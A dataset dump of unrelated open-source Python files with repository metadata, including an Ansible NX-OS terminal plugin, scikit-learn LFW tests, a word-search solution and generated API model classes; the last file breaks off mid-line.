3f5f7777bc8920d17095f915f96a0d7b1b008d6b | a1bffcd8854e1843e56bb812d4d83b3161a5211e | /plugins/terminal/nxos.py | f093b70b69edb7d451e1ffb889970913d6c3de30 | [] | no_license | goneri/ansible.community | 1a71f9d98c164b77f8ed2ed7f558b4963005ff8f | f26f612dd0a3154050d90b51a75502018c95f6e4 | refs/heads/master | 2020-12-29T07:47:35.353515 | 2020-01-22T17:43:18 | 2020-01-22T17:43:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,459 | py | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
import json
from ansible.plugins.terminal import TerminalBase
from ansible.errors import AnsibleConnectionFailure
from ansible_collections.ansible.community.plugins.module_utils._text import to_bytes, to_text
class TerminalModule(TerminalBase):
terminal_stdout_re = [
re.compile(br'[\r\n](?!\s*<)?(\x1b\S+)*[a-zA-Z_0-9]{1}[a-zA-Z0-9-_.]*[>|#](?:\s*)(\x1b\S+)*$'),
re.compile(br'[\r\n]?[a-zA-Z0-9]{1}[a-zA-Z0-9-_.]*\(.+\)#(?:\s*)$')
]
terminal_stderr_re = [
re.compile(br"% ?Error"),
re.compile(br"^error:(.*)", re.I),
re.compile(br"^% \w+", re.M),
re.compile(br"% ?Bad secret"),
re.compile(br"invalid input", re.I),
re.compile(br"(?:incomplete|ambiguous) command", re.I),
re.compile(br"connection timed out", re.I),
re.compile(br"[^\r\n]+ not found", re.I),
re.compile(br"'[^']' +returned error code: ?\d+"),
re.compile(br"syntax error"),
re.compile(br"unknown command"),
re.compile(br"user not present"),
re.compile(br"invalid (.+?)at '\^' marker", re.I),
re.compile(br"configuration not allowed .+ at '\^' marker"),
re.compile(br"[B|b]aud rate of console should be.* (\d*) to increase [a-z]* level", re.I),
]
def on_become(self, passwd=None):
if self._get_prompt().endswith(b'enable#'):
return
out = self._exec_cli_command('show privilege')
out = to_text(out, errors='surrogate_then_replace').strip()
if 'Disabled' in out:
raise AnsibleConnectionFailure('Feature privilege is not enabled')
# if already at privilege level 15 return
if '15' in out:
return
if self.validate_user_role():
return
cmd = {u'command': u'enable'}
if passwd:
cmd[u'prompt'] = to_text(r"(?i)[\r\n]?Password: $", errors='surrogate_or_strict')
cmd[u'answer'] = passwd
cmd[u'prompt_retry_check'] = True
try:
self._exec_cli_command(to_bytes(json.dumps(cmd), errors='surrogate_or_strict'))
prompt = self._get_prompt()
if prompt is None or not prompt.strip().endswith(b'enable#'):
raise AnsibleConnectionFailure('failed to elevate privilege to enable mode still at prompt [%s]' % prompt)
except AnsibleConnectionFailure as e:
prompt = self._get_prompt()
raise AnsibleConnectionFailure('unable to elevate privilege to enable mode, at prompt [%s] with error: %s' % (prompt, e.message))
def on_unbecome(self):
prompt = self._get_prompt()
if prompt is None:
# if prompt is None most likely the terminal is hung up at a prompt
return
if b'(config' in prompt:
self._exec_cli_command('end')
self._exec_cli_command('exit')
elif prompt.endswith(b'enable#'):
self._exec_cli_command('exit')
def on_open_shell(self):
try:
for cmd in ('terminal length 0', 'terminal width 511'):
self._exec_cli_command(cmd)
except AnsibleConnectionFailure:
raise AnsibleConnectionFailure('unable to set terminal parameters')
def validate_user_role(self):
user = self._connection._play_context.remote_user
out = self._exec_cli_command('show user-account %s' % user)
out = to_text(out, errors='surrogate_then_replace').strip()
match = re.search(r'roles:(.+)$', out, re.M)
if match:
roles = match.group(1).split()
if 'network-admin' in roles:
return True
return False
| [
"ansible_migration@example.com"
] | ansible_migration@example.com |
d6c566b32dfe352180d1386f041b191f852b2d05 | ca66a4283c5137f835377c3ed9a37128fcaed037 | /Lib/site-packages/sklearn/datasets/tests/test_lfw.py | ef3e181b7ea130652cd413504429c6cda3597051 | [] | no_license | NamithaKonda09/majorProject | f377f7a77d40939a659a3e59f5f1b771d88889ad | 4eff4ff18fa828c6278b00244ff2e66522e0cd51 | refs/heads/master | 2023-06-04T20:25:38.450271 | 2021-06-24T19:03:46 | 2021-06-24T19:03:46 | 370,240,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,768 | py | """This test for the LFW require medium-size data downloading and processing
If the data has not been already downloaded by running the examples,
the tests won't run (skipped).
If the test are run, the first execution will be long (typically a bit
more than a couple of minutes) but as the dataset loader is leveraging
joblib, successive runs will be fast (less than 200ms).
"""
import random
import os
import shutil
import tempfile
import numpy as np
from functools import partial
from sklearn.externals import six
from sklearn.externals._pilutil import pillow_installed, imsave
from sklearn.datasets import fetch_lfw_pairs
from sklearn.datasets import fetch_lfw_people
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import SkipTest
from sklearn.utils.testing import assert_raises
from sklearn.datasets.tests.test_common import check_return_X_y
SCIKIT_LEARN_DATA = tempfile.mkdtemp(prefix="scikit_learn_lfw_test_")
SCIKIT_LEARN_EMPTY_DATA = tempfile.mkdtemp(prefix="scikit_learn_empty_test_")
LFW_HOME = os.path.join(SCIKIT_LEARN_DATA, 'lfw_home')
FAKE_NAMES = [
'Abdelatif_Smith',
'Abhati_Kepler',
'Camara_Alvaro',
'Chen_Dupont',
'John_Lee',
'Lin_Bauman',
'Onur_Lopez',
]
def setup_module():
"""Test fixture run once and common to all tests of this module"""
if not pillow_installed:
raise SkipTest("PIL not installed.")
if not os.path.exists(LFW_HOME):
os.makedirs(LFW_HOME)
random_state = random.Random(42)
np_rng = np.random.RandomState(42)
# generate some random jpeg files for each person
counts = {}
for name in FAKE_NAMES:
folder_name = os.path.join(LFW_HOME, 'lfw_funneled', name)
if not os.path.exists(folder_name):
os.makedirs(folder_name)
n_faces = np_rng.randint(1, 5)
counts[name] = n_faces
for i in range(n_faces):
file_path = os.path.join(folder_name, name + '_%04d.jpg' % i)
uniface = np_rng.randint(0, 255, size=(250, 250, 3))
try:
imsave(file_path, uniface)
except ImportError:
raise SkipTest("PIL not installed")
# add some random file pollution to test robustness
with open(os.path.join(LFW_HOME, 'lfw_funneled', '.test.swp'), 'wb') as f:
f.write(six.b('Text file to be ignored by the dataset loader.'))
# generate some pairing metadata files using the same format as LFW
with open(os.path.join(LFW_HOME, 'pairsDevTrain.txt'), 'wb') as f:
f.write(six.b("10\n"))
more_than_two = [name for name, count in six.iteritems(counts)
if count >= 2]
for i in range(5):
name = random_state.choice(more_than_two)
first, second = random_state.sample(range(counts[name]), 2)
f.write(six.b('%s\t%d\t%d\n' % (name, first, second)))
for i in range(5):
first_name, second_name = random_state.sample(FAKE_NAMES, 2)
first_index = random_state.choice(np.arange(counts[first_name]))
second_index = random_state.choice(np.arange(counts[second_name]))
f.write(six.b('%s\t%d\t%s\t%d\n' % (first_name, first_index,
second_name, second_index)))
with open(os.path.join(LFW_HOME, 'pairsDevTest.txt'), 'wb') as f:
f.write(six.b("Fake place holder that won't be tested"))
with open(os.path.join(LFW_HOME, 'pairs.txt'), 'wb') as f:
f.write(six.b("Fake place holder that won't be tested"))
def teardown_module():
"""Test fixture (clean up) run once after all tests of this module"""
if os.path.isdir(SCIKIT_LEARN_DATA):
shutil.rmtree(SCIKIT_LEARN_DATA)
if os.path.isdir(SCIKIT_LEARN_EMPTY_DATA):
shutil.rmtree(SCIKIT_LEARN_EMPTY_DATA)
def test_load_empty_lfw_people():
assert_raises(IOError, fetch_lfw_people, data_home=SCIKIT_LEARN_EMPTY_DATA,
download_if_missing=False)
def test_load_fake_lfw_people():
lfw_people = fetch_lfw_people(data_home=SCIKIT_LEARN_DATA,
min_faces_per_person=3,
download_if_missing=False)
# The data is croped around the center as a rectangular bounding box
# around the face. Colors are converted to gray levels:
assert_equal(lfw_people.images.shape, (10, 62, 47))
assert_equal(lfw_people.data.shape, (10, 2914))
# the target is array of person integer ids
assert_array_equal(lfw_people.target, [2, 0, 1, 0, 2, 0, 2, 1, 1, 2])
# names of the persons can be found using the target_names array
expected_classes = ['Abdelatif Smith', 'Abhati Kepler', 'Onur Lopez']
assert_array_equal(lfw_people.target_names, expected_classes)
# It is possible to ask for the original data without any croping or color
# conversion and not limit on the number of picture per person
lfw_people = fetch_lfw_people(data_home=SCIKIT_LEARN_DATA, resize=None,
slice_=None, color=True,
download_if_missing=False)
assert_equal(lfw_people.images.shape, (17, 250, 250, 3))
# the ids and class names are the same as previously
assert_array_equal(lfw_people.target,
[0, 0, 1, 6, 5, 6, 3, 6, 0, 3, 6, 1, 2, 4, 5, 1, 2])
assert_array_equal(lfw_people.target_names,
['Abdelatif Smith', 'Abhati Kepler', 'Camara Alvaro',
'Chen Dupont', 'John Lee', 'Lin Bauman', 'Onur Lopez'])
# test return_X_y option
fetch_func = partial(fetch_lfw_people, data_home=SCIKIT_LEARN_DATA,
resize=None,
slice_=None, color=True,
download_if_missing=False)
check_return_X_y(lfw_people, fetch_func)
def test_load_fake_lfw_people_too_restrictive():
assert_raises(ValueError, fetch_lfw_people, data_home=SCIKIT_LEARN_DATA,
min_faces_per_person=100, download_if_missing=False)
def test_load_empty_lfw_pairs():
assert_raises(IOError, fetch_lfw_pairs,
data_home=SCIKIT_LEARN_EMPTY_DATA,
download_if_missing=False)
def test_load_fake_lfw_pairs():
lfw_pairs_train = fetch_lfw_pairs(data_home=SCIKIT_LEARN_DATA,
download_if_missing=False)
# The data is croped around the center as a rectangular bounding box
# around the face. Colors are converted to gray levels:
assert_equal(lfw_pairs_train.pairs.shape, (10, 2, 62, 47))
# the target is whether the person is the same or not
assert_array_equal(lfw_pairs_train.target, [1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
# names of the persons can be found using the target_names array
expected_classes = ['Different persons', 'Same person']
assert_array_equal(lfw_pairs_train.target_names, expected_classes)
# It is possible to ask for the original data without any croping or color
# conversion
lfw_pairs_train = fetch_lfw_pairs(data_home=SCIKIT_LEARN_DATA, resize=None,
slice_=None, color=True,
download_if_missing=False)
assert_equal(lfw_pairs_train.pairs.shape, (10, 2, 250, 250, 3))
# the ids and class names are the same as previously
assert_array_equal(lfw_pairs_train.target, [1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
assert_array_equal(lfw_pairs_train.target_names, expected_classes)
| [
"namithakonda09@gmail.com"
] | namithakonda09@gmail.com |
604599cedc334aac2215f97356a0b6f4335a8b7e | effce116340b7d937bd285e43b49e1ef83d56156 | /data_files/077 Word Search.py | df667d96008f38fbe8068603ea7dac53fef15da9 | [] | no_license | DL2021Spring/CourseProject | a7c7ef57d69bc1b21e3303e737abb27bee3bd585 | 108cdd906e705e9d4d05640af32d34bfc8b124da | refs/heads/master | 2023-04-11T18:52:30.562103 | 2021-05-18T09:59:59 | 2021-05-18T09:59:59 | 365,733,976 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,542 | py |
__author__ = 'Danyang'
class Solution:
def exist(self, board, word):
if not board:
return
m = len(board)
n = len(board[0])
visited = [[False for _ in xrange(n)] for _ in xrange(m)]
for i in xrange(m):
for j in xrange(n):
if board[i][j]==word[0]:
visited[i][j] = True
if self.search(board, i, j, word[1:], visited):
return True
visited[i][j] = False
return False
def search(self, board, pre_row, pre_col, word, visited):
if not word:
return True
m = len(board)
n = len(board[0])
next_positions = [(pre_row-1, pre_col), (pre_row+1, pre_col), (pre_row, pre_col-1), (pre_row, pre_col+1)]
for next_position in next_positions:
if 0<=next_position[0]<m and 0<=next_position[1]<n:
if visited[next_position[0]][next_position[1]]==False and board[next_position[0]][next_position[1]]==word[0]:
visited[next_position[0]][next_position[1]] = True
if self.search(board, next_position[0], next_position[1], word[1:], visited):
return True
visited[next_position[0]][next_position[1]] = False
return False
if __name__=="__main__":
board = [
"ABCE",
"SFCS",
"ADEE"
]
word = "ABCCED"
print Solution().exist(board, word) | [
"1042448815@qq.com"
] | 1042448815@qq.com |
c800922df670b98c575e1b37bf3ed5a8a111b60b | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flasharray/FA_2_17/models/remote_protection_group_response.py | 7dc6d86902296b0ff666f551e0f931da5d595eaf | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 4,024 | py | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.17
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_17 import models
class RemoteProtectionGroupResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'items': 'list[RemoteProtectionGroup]'
}
attribute_map = {
'items': 'items'
}
required_args = {
}
def __init__(
self,
items=None, # type: List[models.RemoteProtectionGroup]
):
"""
Keyword args:
items (list[RemoteProtectionGroup]): Returns a list of all items after filtering. The values are displayed for each name where meaningful.
"""
if items is not None:
self.items = items
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `RemoteProtectionGroupResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def __getitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `RemoteProtectionGroupResponse`".format(key))
return object.__getattribute__(self, key)
def __setitem__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `RemoteProtectionGroupResponse`".format(key))
object.__setattr__(self, key, value)
def __delitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `RemoteProtectionGroupResponse`".format(key))
object.__delattr__(self, key)
def keys(self):
return self.attribute_map.keys()
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(RemoteProtectionGroupResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RemoteProtectionGroupResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"noreply@github.com"
] | PureStorage-OpenConnect.noreply@github.com |
34bdda6befcd530668ce884b66c6f71627ad7812 | 06b1e6b254d0be9f42f4832f94f5ba225ea54b80 | /tests/test_commands/test_deps_tree.py | b9d8355d47a3cf352de388aef766d3d2b9ee8f14 | [
"MIT"
] | permissive | b0g3r/dephell | 9481b7023b65d94bea5825e9784907c6f57f6d79 | 40f3451bf5958284af021fbd5486ad71c03efc25 | refs/heads/master | 2020-06-13T16:24:41.404188 | 2019-06-26T17:16:15 | 2019-06-26T17:16:15 | 194,709,388 | 0 | 0 | null | 2019-07-01T16:38:57 | 2019-07-01T16:38:56 | null | UTF-8 | Python | false | false | 763 | py | # built-in
import json
from pathlib import Path
# project
import pytest
from dephell.commands import DepsTreeCommand
from dephell.config import Config
@pytest.mark.allow_hosts()
def test_deps_tree_command(temp_path: Path, capsys):
config = Config()
config.attach({
'level': 'WARNING',
'silent': True,
})
command = DepsTreeCommand(argv=['--type=json', 'autopep8==1.4.3'], config=config)
result = command()
captured = capsys.readouterr()
output = json.loads(captured.out)
assert result is True
assert len(output) == 2
assert output[0]['name'] == 'autopep8'
assert output[0]['dependencies'] == ['pycodestyle']
assert output[1]['name'] == 'pycodestyle'
assert output[1]['dependencies'] == []
| [
"master_fess@mail.ru"
] | master_fess@mail.ru |
97e53264bee22412d3530524e5d9112807c0a671 | ca299cec2cd84d8b7c2571fa2fdf7161e66b8fe7 | /private_server/guard/CELL-34/Q-33/34-33.py | 259448e0006f40ecbc27700fd825b133d9cb27bf | [] | no_license | benmechen/CodeSet | ca57d4a065ac4fc737749f65cb5aa1011d446a88 | f5a4bf627a9a8efc76a65ae58db63a973fedffb7 | refs/heads/master | 2021-07-16T14:23:36.355491 | 2019-12-02T13:58:27 | 2019-12-02T13:58:27 | 225,385,245 | 1 | 0 | null | 2021-06-22T15:37:57 | 2019-12-02T13:47:09 | JavaScript | UTF-8 | Python | false | false | 148 | py | from datetime import datetime
now = datetime.now()
year = now.year
month = now.month
day = now.day
print(now)
print(year)
print(month)
print(day) | [
"psybm7@nottingham.ac.uk"
] | psybm7@nottingham.ac.uk |
108dfa96dc0b6497ddfb5addccc22f6f7974880a | 138f2550bb088a0597e1e71124d9ae32b1fe59c9 | /xbrr/edinet/models/documents.py | 8b15506df1c609b1ab2e24c2fd4dc3f37fbd524f | [
"MIT"
] | permissive | chakki-works/xbrr | 9009539e1821c3d9c815f694eb52158ccbbeeb78 | a9783acbb6c23eb0be0e1fbfb47e5b0b0e2cbfb8 | refs/heads/master | 2022-07-22T22:30:17.054418 | 2021-06-16T13:27:40 | 2021-06-16T13:27:40 | 182,622,738 | 23 | 5 | MIT | 2022-07-15T18:42:36 | 2019-04-22T04:26:21 | Python | UTF-8 | Python | false | false | 999 | py | from xbrr.edinet.models.metadata import MetaData
from xbrr.edinet.models.document import Document
class Documents():
"""Document lists"""
def __init__(self, metadata: MetaData = None, documents: list = ()):
"""
Keyword Arguments:
count {MetaData} -- Metadata (default: {None}).
documents {list} -- Document list (default: {()}).
"""
self.metadata = metadata
self.__documents = documents
@property
def list(self):
return self.__documents
@classmethod
def create(cls, body: dict) -> "Documents":
"""Create instance from EDINET response.
Arguments:
body {dict} -- EDINET response.
Returns:
Documents -- Documents and its metadata.
"""
metadata = MetaData.create(body)
_documents = body["results"]
documents = [Document.create(d) for d in _documents]
instance = cls(metadata, documents)
return instance
| [
"icoxfog417@yahoo.co.jp"
] | icoxfog417@yahoo.co.jp |
406a7ce5aac74ea320d07ca700ccb30e3dee2c7f | 8ae28de60c84c4f36d29289bad14cf8bbb4be1ba | /bot/units/models/terran/cyclone.py | b9eef5eb284ad781ced60ff5809439fd0b96b40d | [
"MIT"
] | permissive | ljuti/raynors-rangers | 05d0be6e5dcb9e480f6a75bf0b7fe216f05da8d1 | 1f9f3a39aa62c8956987e322d690318c7b67e283 | refs/heads/master | 2023-04-30T23:06:26.893739 | 2019-05-19T20:21:49 | 2019-05-19T20:22:08 | 169,393,223 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | class CycloneModel():
def __init__(self):
self.supply = 3
self.cargo_size = 3
self.health = 180
self.range = 4
self.range_upgraded = 6
self.sight = 11
self.speed = 4.13
self.ground_attack = True
self.aerial_attack = True | [
"ruby@laurijutila.com"
] | ruby@laurijutila.com |
5799c479daf151abfecc6cf23b20949168fe1702 | 7dbb60661d3d8b8e0ded9d3febd21032e5c281d5 | /Pycon2009/excell/xlrd/open.py | c338f5150dc90a9ed67d5717dfc0ca0cd8a1fb0a | [] | no_license | cabecada/pydanny-event-notes | dc8175196e936a8c97b9009281c184beecd28778 | cda2a32cafe96701f4e728d4802ef3f3d9d5e9a0 | refs/heads/master | 2021-01-24T04:54:14.991218 | 2018-01-24T23:45:37 | 2018-01-24T23:45:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | from mmap import mmap,ACCESS_READ
from xlrd import open_workbook
print open_workbook('simple.xls')
with open('simple.xls', 'rb') as f:
print open_workbook(
file_contents=mmap(f.fileno(),0,access=ACCESS_READ)
)
aString = open('simple.xls','rb').read()
print open_workbook(file_contents=aString)
| [
"pydanny@gmail.com"
] | pydanny@gmail.com |
d5bcf06456df9f6bf43807cb045a5cb3a0d9f605 | 94f1711fc8b25f3c027ee64a1c44e7a7c9be9972 | /examples/plot.py | 0df8728bfdbe26d21fe46b36dc700454caa2dd9e | [] | no_license | ALBA-Synchrotron/sls-detector | b5211a98800c2d271569b775bc1e48224ee89313 | 961d33152af298eb4cbd311d9d185683ba992199 | refs/heads/master | 2023-07-01T14:26:11.152686 | 2021-07-30T10:06:14 | 2021-07-30T10:06:14 | 262,325,338 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,030 | py | import argparse
import threading
import pyqtgraph
from pyqtgraph.Qt import QtGui, QtCore
import sls.client
class QDetector(QtCore.QObject):
newFrame = QtCore.Signal(object)
def run(options):
app = QtGui.QApplication([])
plot = pyqtgraph.plot()
curve = plot.plot()
plot.show()
mythen = sls.client.Detector(options.host)
mythen.nb_frames = options.nb_frames
mythen.exposure_time = options.exposure_time
qmythen = QDetector()
def acquire(curve):
for frame in mythen.acquire():
qmythen.newFrame.emit(frame)
qmythen.newFrame.connect(curve.setData)
th = threading.Thread(target=acquire, args=(curve,), daemon=True)
th.start()
app.exec_()
def main(args=None):
p = argparse.ArgumentParser()
p.add_argument('--nb-frames', default=10, type=int)
p.add_argument('--exposure-time', default=0.1, type=float)
p.add_argument('--host', default='localhost')
opts = p.parse_args(args)
run(opts)
if __name__ == '__main__':
main()
| [
"coutinhotiago@gmail.com"
] | coutinhotiago@gmail.com |
157381b94215aba0360d4819a7269f9adf6b9595 | 1025bc2aa5aaa40970ad1a51d8d0b1202a1ea11e | /Utilities/python/rootbindings.py | 675032fc480bd291fe0ad8c11edb5d6bdaab6d34 | [] | no_license | uwcms/FinalStateAnalysis | f2be318546728621676a4b90ed2678b2560c94e6 | bcb164a8e27d459a9ac438780f6c8730d3e856bf | refs/heads/miniAOD_9_4_0 | 2022-11-09T01:28:52.199025 | 2019-03-15T19:25:10 | 2019-03-15T19:25:10 | 5,201,989 | 5 | 32 | null | 2020-11-19T17:02:32 | 2012-07-27T07:51:18 | Python | UTF-8 | Python | false | false | 259 | py | import ROOT
## ROOT.gSystem.Load("libFinalStateAnalysisStatTools")
## ROOT.gSystem.Load('libFinalStateAnalysisTagAndProbe')
ROOT.gSystem.Load('libFinalStateAnalysisUtilities')
#ROOT.gSystem.Load('$CMSSW_BASE/lib/$SCRAM_ARCH/libHiggsAnalysisCombinedLimit.so')
| [
"Silvia.Taroni@cern.ch"
] | Silvia.Taroni@cern.ch |
6b5df35f09ed114b1f7f501d8fe3b0dc271e5838 | 03778e9985613ffccd8e2076ed51e86e86f997b6 | /pysad/models/standard_absolute_deviation.py | 169b9170f9ec8f4192f841274f51c846c746ec8d | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | isci1102/pysad | e3fe263a075fc51ee2bce548da458222ec5a3b7a | dff2ff38258eb8a85c9d34cf5f0b876fc1dc9ede | refs/heads/master | 2023-03-18T03:33:19.345541 | 2020-09-08T01:32:29 | 2020-09-08T01:32:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,185 | py | from pysad.core.base_model import BaseModel
from pysad.statistics.average_meter import AverageMeter
from pysad.statistics.median_meter import MedianMeter
from pysad.statistics.variance_meter import VarianceMeter
class StandardAbsoluteDeviation(BaseModel):
"""The model that assigns the deviation from the mean (or median) and divides with the standard deviation. This model is based on the 3-Sigma rule described in :cite:`hochenbaum2017automatic`.
substracted_statistic (str): The statistic to be substracted for scoring. It is either "mean" or "median". (Default="mean").
absolute (bool): Whether to output score's absolute value. (Default=True).
"""
def __init__(self, substracted_statistic="mean", absolute=True):
self.absolute = absolute
self.variance_meter = VarianceMeter()
if substracted_statistic == "median":
self.sub_meter = MedianMeter()
elif substracted_statistic == "mean":
self.sub_meter = AverageMeter()
else:
raise ValueError(
"Unknown substracted_statistic value! Please choose median or mean.")
def fit_partial(self, X, y=None):
"""Fits the model to next instance.
Args:
X (np.float array of shape (1,)): The instance to fit. Note that this model is univariate.
y (int): Ignored since the model is unsupervised (Default=None).
Returns:
object: Returns the self.
"""
assert len(X) == 1 # Only for time series
self.variance_meter.update(X)
self.sub_meter.update(X)
return self
def score_partial(self, X):
"""Scores the anomalousness of the next instance.
Args:
X (np.float array of shape (1,)): The instance to score. Higher scores represent more anomalous instances whereas lower scores correspond to more normal instances.
Returns:
float: The anomalousness score of the input instance.
"""
sub = self.sub_meter.get()
dev = self.variance_meter.get()**0.5
score = (X - sub) / (dev + 1e-10)
return abs(score) if self.absolute else score
| [
"yilmazselimfirat@gmail.com"
] | yilmazselimfirat@gmail.com |
1472d32a4b5d251e86c90bb8047f947c76ee319e | 31ba27461d50fcd85027318eacefa04d828feb4b | /addons/web-addons/__unported__/web_percent/__init__.py | 658c115ad64576f6692ee844b890b5666bbf1ba0 | [] | no_license | TinPlusIT05/tms | 5f258cec903d5bf43c26b93fc112fce0b32de828 | 673dd0f2a7c0b69a984342b20f55164a97a00529 | refs/heads/master | 2022-12-04T02:11:54.770745 | 2019-09-23T07:18:11 | 2019-09-23T07:18:11 | 210,278,672 | 0 | 0 | null | 2022-11-22T00:30:37 | 2019-09-23T06:18:48 | Python | UTF-8 | Python | false | false | 996 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014 TeMPO Consulting (<http://www.tempo-consulting.fr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
| [
"Tinplusit05@gmail.com"
] | Tinplusit05@gmail.com |
c9e7539b202b1738a137cfccd61c1f9be308fe28 | 70cdf0741a22c678401a306229003bf036ffe5a6 | /ocbind/network_instances/network_instance/protocols/protocol/isis/levels/level/traffic_engineering/state/__init__.py | a68fd130b13467316ffbc9fb71519d044dcfca4e | [] | no_license | zsblevins/nanog81-hackathon | 5001e034339d6b0c6452ae2474f06916bcd715cf | 1b64fd207dd69837f947094fbd6d6c1cea3a1070 | refs/heads/main | 2023-03-03T09:39:28.460000 | 2021-02-15T13:41:38 | 2021-02-15T13:41:38 | 336,698,856 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 51,682 | py | # -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/traffic-engineering/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS TE state information.
"""
__slots__ = ('_path_helper', '_extmethods', '__enabled','__ipv4_router_id','__ipv6_router_id',)
_yang_name = 'state'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__enabled = YANGDynClass(base=YANGBool, default=YANGBool("false"), is_leaf=True, yang_name="enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='boolean', is_config=False)
self.__ipv4_router_id = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}), is_leaf=True, yang_name="ipv4-router-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ipv4-address-no-zone', is_config=False)
